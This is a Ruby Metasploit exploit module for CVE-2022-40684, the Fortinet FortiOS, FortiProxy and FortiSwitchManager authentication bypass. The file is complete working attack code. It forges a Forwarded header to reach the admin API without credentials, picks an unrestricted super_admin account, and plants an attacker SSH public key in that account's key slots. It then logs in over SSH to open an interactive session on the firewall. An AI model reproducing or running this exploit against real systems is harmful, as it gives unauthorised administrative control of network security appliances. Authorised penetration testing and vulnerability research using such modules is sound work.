##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::SSH
  prepend Msf::Exploit::Remote::AutoCheck

  attr_accessor :ssh_socket

  # Declares the module metadata (name, references, target, default options,
  # stability notes) and registers the user-configurable options.
  #
  # SSH_RPORT is registered as an OptPort so that the framework validates it
  # as a TCP port and hands it back as an Integer.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Fortinet FortiOS, FortiProxy, and FortiSwitchManager authentication bypass.',
        'Description' => %q{
          This module exploits an authentication bypass vulnerability
          in the Fortinet FortiOS, FortiProxy, and FortiSwitchManager API
          to gain access to a chosen account. And then add a SSH key to the
          authorized_keys file of the chosen account, allowing
          to login to the system with the chosen account.

          Successful exploitation results in remote code execution.
        },
        'Author' => [
          'Heyder Andrade <@HeyderAndrade>', # Metasploit module
          'Zach Hanley <@hacks_zach>', # PoC
        ],
        'References' => [
          ['CVE', '2022-40684'],
          ['URL', 'https://www.fortiguard.com/psirt/FG-IR-22-377'],
          ['URL', 'https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684'],
        ],
        'License' => MSF_LICENSE,
        'DisclosureDate' => '2022-10-10', # Vendor advisory
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD],
        'Privileged' => true,
        'Targets' => [
          [
            'FortiOS',
            {
              'DefaultOptions' => {
                'PAYLOAD' => 'generic/ssh/interact'
              },
              'Payload' => {
                'Compat' => {
                  'PayloadType' => 'ssh_interact'
                }
              }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'RPORT' => 443,
          'SSL' => true
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [
            IOC_IN_LOGS,
            ARTIFACTS_ON_DISK # SSH key is added to authorized_keys file
          ]
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to the Fortinet CMDB API', '/api/v2/cmdb/']),
        OptString.new('USERNAME', [false, 'Target username (Default: auto-detect)', nil]),
        OptString.new('PRIVATE_KEY', [false, 'SSH private key file path', nil]),
        OptString.new('KEY_PASS', [false, 'SSH private key password', nil]),
        OptPort.new('SSH_RPORT', [true, 'SSH port to connect to', 22]),
        OptBool.new('PREFER_ADMIN', [false, 'Prefer to use the admin user if one is detected', true])
      ]
    )
  end

  # Account the module operates on. The USERNAME option wins when it is set;
  # otherwise the result of detect_username is used. The first truthy value
  # obtained is cached in @username and returned on later calls.
  def username
    return @username if @username

    configured = datastore['USERNAME']
    @username = configured || detect_username
  end

  # Value of the SSH_RPORT option: the port used both for the SSH reachability
  # probe in #check and for the SSH login in #exploit.
  def ssh_rport
    datastore['SSH_RPORT']
  end

  # SSH public keys found on the target account, as returned by read_keys.
  # The list is fetched on first use and cached in @current_keys, so it keeps
  # reflecting the state seen at that first read.
  def current_keys
    return @current_keys if @current_keys

    @current_keys = read_keys
  end

  # Key pair used for the SSH login, created once and cached in @ssh_keygen.
  #
  # When PRIVATE_KEY is set, the file is read and parsed with
  # Net::SSH::KeyFactory.load_data_private_key, using KEY_PASS as passphrase.
  # Otherwise a fresh EC key on the prime256v1 curve is generated.
  def ssh_keygen
    return @ssh_keygen if @ssh_keygen

    key_path = datastore['PRIVATE_KEY']
    @ssh_keygen =
      if key_path
        # Positional arguments are (data, passphrase, ask_passphrase, filename).
        # The path belongs in the fourth slot; ask_passphrase stays truthy, as
        # it effectively was when the path string occupied the third slot.
        Net::SSH::KeyFactory.load_data_private_key(
          File.read(key_path),
          datastore['KEY_PASS'],
          true,
          key_path
        )
      else
        OpenSSL::PKey::EC.generate('prime256v1')
      end
  end

  # PEM serialisation (via #to_pem) of the key returned by ssh_keygen; this is
  # what #exploit hands to the SSH client as key_data.
  def ssh_private_key
    ssh_keygen.to_pem
  end

  # Base64 text of the public half of ssh_keygen, built from the key's
  # #to_blob output.
  def ssh_pubkey
    public_half = ssh_keygen.public_key
    blob = public_half.to_blob
    Rex::Text.encode_base64(blob)
  end

  # The authorized_keys style entry for our key:
  # "<ssh key type> <base64 public key> <username>@localhost".
  #
  # Reuses ssh_pubkey for the base64 part instead of repeating the encoding,
  # so both methods always agree on the key material.
  def authorized_keys
    "#{ssh_keygen.ssh_type} #{ssh_pubkey} #{username}@localhost"
  end

  # Sends an HTTP request carrying the headers this module uses for the
  # authentication bypass attempt: a JSON content type, the 'Report Runner'
  # user agent and a Forwarded header naming 127.0.0.1 (with random ports) as
  # both the "for" and "by" endpoints.
  #
  # params is merged over these defaults (shallow merge), so any key supplied
  # by the caller replaces the default of the same name.
  def fortinet_request(params = {})
    source_port = rand(1024..65535)
    proxy_port = rand(1024..65535)

    defaults = {
      'ctype' => 'application/json',
      'agent' => 'Report Runner',
      'headers' => {
        'Forwarded' => "for=\"[127.0.0.1]:#{source_port}\";by=\"[127.0.0.1]:#{proxy_port}\""
      }
    }

    send_request_cgi(defaults.merge(params))
  end

  # Determines whether the target looks exploitable.
  #
  # 1. A plain request to a random API path must be answered with 401.
  # 2. The same API, queried through fortinet_request at /system/status, must
  #    answer 200; the reported version is printed.
  # 3. The SSH port must accept a TCP connection, since the exploit needs SSH
  #    to make use of the injected key.
  #
  # Returns a CheckCode (Unknown, Safe or Vulnerable).
  def check
    vprint_status("Checking #{datastore['RHOST']}:#{datastore['RPORT']}")
    # a normal request to the API should return a 401
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, Rex::Text.rand_text_alpha_lower(6)),
      'ctype' => 'application/json'
    })

    return CheckCode::Unknown('Target did not respond to check.') unless res
    return CheckCode::Safe('Target seems not affected by this vulnerability.') unless res.code == 401

    # Try to bypass the authentication and read the system status; it should return a 200 if vulnerable
    res = fortinet_request({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, '/system/status')
    })

    return CheckCode::Safe unless res&.code == 200

    version = res.get_json_document['version']

    print_good("Target is running the version #{version}, which is vulnerable.")

    begin
      # Socket.tcp raises when the port is closed, filtered or unreachable (it
      # never yields nil), so an unreachable SSH service is detected through
      # the exception. The probe socket is closed as soon as it connects.
      Socket.tcp(rhost, ssh_rport, connect_timeout: datastore['SSH_TIMEOUT']).close
    rescue SystemCallError, SocketError
      return CheckCode::Safe("However SSH is not open, so adding a ssh key wouldn't give you access to the host.")
    end

    CheckCode::Vulnerable('And SSH is running which makes it exploitable.')
  end

  # Undoes the key injection once an SSH session has been established, then
  # lets the mixins run their own cleanup.
  #
  # The API did not respond to DELETE, so the slot holding our key is
  # overwritten with a PUT instead. The slot is derived the same way
  # add_ssh_key chose it (current_keys is the list read before the key was
  # added):
  #
  # * our key was already present: blank the slot where it was found;
  # * otherwise it was written right after the first two existing keys, i.e.
  #   slot min(existing, 2) + 1. If a third key existed it was displaced by
  #   ours, so that slot is set back to the displaced key rather than blanked.
  def cleanup
    return unless ssh_socket

    existing_index = current_keys.index(authorized_keys)
    if existing_index
      slot = existing_index + 1
      value = '""'
    else
      slot = [current_keys.size, 2].min + 1
      displaced = current_keys[slot - 1]
      value = displaced ? "\"#{displaced}\"" : '""'
    end

    fortinet_request({
      'method' => 'PUT',
      'uri' => normalize_uri(target_uri.path, '/system/admin/', username),
      'data' => { "ssh-public-key#{slot}" => value }.to_json
    })
  ensure
    # Always hand over to the parent/mixin cleanup, whether or not a session
    # was opened and whether or not the request above raised.
    super
  end

  # Picks the account to target from the administrator list returned by the
  # API at /system/admin.
  #
  # Only entries whose accprofile is 'super_admin' and whose trusthost1 is
  # '0.0.0.0 0.0.0.0' are considered (presumably accounts without a source
  # address restriction -- confirm against FortiOS documentation).
  #
  # With PREFER_ADMIN set, 'admin' is returned when it qualifies, otherwise a
  # random qualifying account. Without it, a random qualifying account other
  # than 'admin' is returned.
  #
  # Fails the module (fail_with) when the list cannot be retrieved or no
  # account qualifies, instead of returning nil to the caller.
  def detect_username
    vprint_status('User auto-detection...')
    res = fortinet_request(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, '/system/admin')
    )
    fail_with(Failure::UnexpectedReply, 'Failed to retrieve the administrator list.') unless res&.code == 200

    entries = res.get_json_document['results']
    fail_with(Failure::UnexpectedReply, 'The administrator list has an unexpected format.') unless entries.is_a?(Array)

    users = entries.select do |e|
      e['accprofile'] == 'super_admin' && e['trusthost1'] == '0.0.0.0 0.0.0.0'
    end.map { |e| e['name'] }.compact

    # we prefer to use admin, but if it doesn't exist we chose a random one.
    chosen =
      if datastore['PREFER_ADMIN']
        vprint_status("PREFER_ADMIN is #{datastore['PREFER_ADMIN']}, but if it isn't found we will pick a random one.")
        users.include?('admin') ? 'admin' : users.sample
      else
        vprint_status("PREFER_ADMIN is #{datastore['PREFER_ADMIN']}, we will get a random that is not the admin.")
        (users - ['admin']).sample
      end

    fail_with(Failure::NotFound, 'No suitable account was detected, set USERNAME manually.') unless chosen
    chosen
  end

  # Writes our public key into the target account's SSH key slots.
  #
  # Nothing is sent when the key is already among current_keys. Otherwise the
  # first two existing keys are re-submitted and ours is appended as the last
  # entry, each value wrapped in double quotes. The server is expected to
  # answer with HTTP 500 and a cli_error mentioning "SSH key is good"; any
  # other outcome fails the module.
  def add_ssh_key
    existing = current_keys
    our_entry = authorized_keys

    if existing.include?(our_entry)
      # then we'll remove that on cleanup
      print_good('Your key is already in the authorized_keys file')
      return
    end

    vprint_status('Adding SSH key to authorized_keys file')

    # Our key goes last, after at most two of the keys already present
    slots = {}
    (existing.first(2) << our_entry).each_with_index do |key, position|
      slots["ssh-public-key#{position + 1}"] = "\"#{key}\""
    end

    res = fortinet_request({
      'method' => 'PUT',
      'uri' => normalize_uri(target_uri.path, '/system/admin/', username),
      'data' => slots.to_json
    })
    fail_with(Failure::UnexpectedReply, 'Failed to add SSH key to authorized_keys file.') unless res&.code == 500

    body = res.get_json_document
    accepted = body.key?('cli_error') && body['cli_error'] =~ /SSH key is good/
    fail_with(Failure::UnexpectedReply, 'Unexpected reponse from the server after adding the key.') unless accepted
  end

  # Fetches the target account's record and returns the SSH public keys it
  # currently holds (ssh-public-key1..3), with the surrounding double quotes
  # removed.
  #
  # Slots that are absent, empty, or contain nothing but quote characters are
  # skipped, so the result only lists real keys. Fails the module when the
  # request does not return 200 or no account record is present.
  def read_keys
    vprint_status('Reading SSH key from authorized_keys file')
    res = fortinet_request({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, '/system/admin/', username)
    })
    fail_with(Failure::UnexpectedReply, 'Failed read current SSH keys') unless res&.code == 200

    results = res.get_json_document['results']
    result = results.first if results.is_a?(Array)
    fail_with(Failure::UnexpectedReply, 'No account record returned while reading SSH keys') unless result.is_a?(Hash)

    %w[ssh-public-key1 ssh-public-key2 ssh-public-key3].map do |slot|
      # to_s guards against a slot missing from the record
      key = result[slot].to_s.delete('"')
      key unless key.empty?
    end.compact
  end

  # Opens the SSH connection to rhost as username and stores it in ssh_socket.
  #
  # The attempt is bounded by the SSH_TIMEOUT option. Every failure mode is
  # reported through fail_with with a matching failure type:
  # connection error, disconnect during negotiation, timeout, rejected
  # authentication, or any other Net::SSH error.
  #
  # ssh_options is the option hash passed to Net::SSH.start.
  def do_login(ssh_options)
    # ensure we don't have a stale socket hanging around
    ssh_options[:proxy].proxies = nil if ssh_options[:proxy]
    begin
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
        self.ssh_socket = Net::SSH.start(rhost, username, ssh_options)
      end
    rescue Rex::ConnectionError
      fail_with(Failure::Unreachable, 'Failed to connect to the SSH service')
    rescue Net::SSH::Disconnect, ::EOFError
      fail_with(Failure::Disconnected, 'Disconnected during negotiation')
    rescue ::Timeout::Error
      # Raised by Timeout.timeout above when SSH_TIMEOUT elapses
      fail_with(Failure::TimeoutExpired, 'Timed out during negotiation')
    rescue Net::SSH::AuthenticationFailed
      fail_with(Failure::NoAccess, 'Failed authentication')
    rescue Net::SSH::Exception => e
      fail_with(Failure::Unknown, "SSH Error: #{e.class} : #{e.message}")
    end

    fail_with(Failure::Unknown, 'Failed to start SSH socket') unless ssh_socket
  end

  # Module entry point: injects our public key into the target account, logs
  # in over SSH with the matching private key (public-key authentication
  # only, on ssh_rport) and hands the resulting connection to the handler.
  def exploit
    target_service = "#{datastore['RHOST']}:#{datastore['RPORT']}"
    print_status("Executing exploit on #{target_service} target user: #{username}")
    add_ssh_key

    vprint_status('Establishing SSH connection')
    login_options = ssh_client_defaults.merge(
      auth_methods: ['publickey'],
      key_data: [ssh_private_key],
      port: ssh_rport
    )
    # SSH_DEBUG turns on the SSH client's debug-level logging
    login_options[:verbose] = :debug if datastore['SSH_DEBUG']

    do_login(login_options)

    handler(ssh_socket)
  end
end
